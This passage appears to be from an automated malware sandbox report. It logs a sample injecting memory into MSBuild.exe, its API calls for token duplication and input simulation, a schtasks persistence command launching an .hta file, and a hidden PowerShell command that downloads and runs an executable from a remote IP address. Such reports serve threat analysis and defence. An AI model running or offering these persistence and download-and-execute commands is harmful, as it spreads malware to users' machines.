                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B81B0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8214
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8278
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B82DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8340
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B83A4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8408
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B846C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B84D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8534
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8598
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B85FC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8660
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B86C4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8728
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B878C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B87F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8854
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B88B8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B891C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8980
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B89E4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8A48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8AAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8B10
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8B74
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8BD8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8C3C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8CA0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8D04
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8D68
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8DCC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8E30
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8E94
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8EF8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8F5C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8FC0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9024
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9088
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B90EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9150
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B91B4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9218
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B927C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B92E0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9344
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B93A8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B940C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9470
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B94D4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9538
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B959C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9600
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9664
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B96C8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B972C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9790
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B97F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9858
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B98BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9920
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9984
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B99E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9A4C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9AB0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9B14
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9B78
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9BDC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9C40
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9CA4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9D08
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9D6C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9DD0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9E34
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9E98
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9EFC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9F60
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9FC4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA028
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA08C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA0F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA154
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA1B8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA21C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA280
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA2E4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA348
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA3AC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA410
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA474
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA4D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA53C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA5A0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA604
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA668
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA6CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA730
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA794
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA7F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA85C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA8C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA924
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA988
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA9EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAA50
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAAB4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAB18
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAB7C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BABE0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAC44
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BACA8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAD0C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAD70
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BADD4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAE38
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAE9C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAF00
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAF64
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAFC8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB02C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB090
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB0F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB158
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB1BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB220
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB284
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB2E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB34C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB3B0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB414
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB478
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB4DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB540
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB5A4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB608
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB66C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB6D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB734
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB798
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB7FC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB860
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB8C4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB928
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB98C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB9F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBA54
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBAB8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBB1C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBB80
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBBE4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBC48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBCAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBD10
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBD74
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBDD8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBE3C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBEA0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBF04
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBF68
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBFCC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC030
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC094
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC0F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC15C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC1C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC224
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC288
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC2EC
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009C1201
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009A2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_009A2BA5
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CB226 SendInput,keybd_event,0_2_009CB226
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009E22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_009E22DA
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
